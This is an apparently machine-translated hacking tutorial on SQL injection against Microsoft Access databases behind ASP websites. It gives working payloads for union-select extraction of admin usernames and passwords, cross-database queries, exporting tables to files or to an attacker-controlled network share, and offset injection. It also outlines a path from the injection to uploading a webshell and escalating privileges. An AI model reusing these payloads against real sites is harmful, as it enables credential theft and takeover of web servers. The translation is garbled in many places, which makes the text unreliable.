Advanced usage of Access injection points

Trust Access injection points are the most visible to everyone. The common perfunctory method is:
Guess the table's guess content --- MD5 --- go to the mountains --- view upload, backup, set information and so on --- upload WEBSEHLL --- Elevation of Privilege. this is the most common and popular ACCESS injection point application action. however, there are too many uncertainties and the music success rate is very low. failure in any step may make you wonder how it works ..

But is ACCESS only capable of this? The answer is no. next, let's take a look at what can be improved and further improved. PS, I believe that action is more than that, but the people created are not openly happy ..

 

--------------------------------------------------------------
Union Query
The first thing we should talk about is the query method. The common query method is
And 1 = (select count (*) from admin where left (id, 1) = '1 ')
So the beginning is determined... even if you use a variety of devices, you can guess one by one to determine whether it is correct or not. such problems are obvious and slow. let's figure out the last 32-bit MD5 encrypted period... you can have another cup of tea.
This is the time when the union select clause appears. Do not think it can only be used in PHP...
For example, you have an ACCESS point:
Http://www.bkjia.com/xiaoyang. asp? Coder = 1
Know that the admin table exists (you can use a device to quickly guess the table and field ),
Then we can directly:
Http://www.bkjia.com/xiaoyang. asp? Coder = 1 union select 1, 2, 3, 4, 5, 6... from admin [where coderx = 1 (if there are limited query conditions)]
Add the header from 1 to the normal echo. Then, change the corresponding 1 ~ X is a password, username, and other objects, you can directly storm the content. Dolly, more fast. Tea can be put first, cooler and then drink again.

 

---------------------------------------------------------------
Access Cross-Database Query
By accident, there were two or more systems on a website operator. You created one with ACCESS injection points, but you couldn't escalate permissions on the back of the Hill. The other system didn't have any injection points, however, you have the necessary functions. so this time, cross-database is coming. of course, you can also use it for MDB overflow and infiltration. his role is unexpected.
Cross-database query statement:
Subquery:
And (Select Count (*) from [D: \ tianyang \ backdoor \ xiaoyang. mdb]. test)> 0
Union query:
Union select 1, 2, 3, 4... from admin in "D: \ xioatianyang \ okok. asa" where id = 1
The role of cross-database is not only that, so everyone can continue to play it. Here is a reference article linking:
Http://www.bkjia.com/Article/200507/5869.html

---------------------------------------------------------------
Access injection, export txt, htm, html
Subquery statement:
SELECT * into export test.txt] in 'd: \ web \ ''text; 'from admin
In this way, the content of the admin table is saved in the d: \ web.
UNION query:
Union select * into pipeline admin.txt] in 'C: \ ''test; 'from admin
In addition, you can make your career in the Mainland:
SELECT * into login test.txt] in '\ yourip \ share ''text;' from admin
However, a lot of people are testing their own tests, and there is no problem to manipulate the local database, but once the injection point is reached, the subquery will show no permission, union will echo the action query cannot be a line of abuse. it can be said that it is still difficult... the reason is probably that UNION only applies to queries, and the post-UNION header cannot follow the action. this forum has a post related to this content:
? Http://www.bkjia.com/viewthread. php? Tid = 3016 & extra = page % 3D7
Because there are a lot of materials related to this on the internet, I just introduced him. if this operation is successful, theoretically we only need to know the table name, and do not need to know the segment name. Then we can see all the table content. maybe we can create. php. tianyang asp. files such as asp may be imported into the file directory ~ It will continue to grow.

---------------------------------------------------------------
Access offset Injection
Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, * from (admin as a inner join admin as B on a. id = B. id)

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,. id, * from (admin as a inner join admin as B on. id = B. id)

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,. id, B. id, * from (admin as a inner join admin as B on. id = B. id)

Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,. id, B. id, c. id, * from (admin as a inner join admin as B on. id = B. id) inner join admin as c on. id = c. id)

Union select 1, 2, 3, 4, 5, 6, 7, 8,. id, B. id, c. id, d. id, * from (admin as a inner join admin as B on. id = B. id) inner join admin as c on. id = c. id) inner join admin as d on. id = d. id)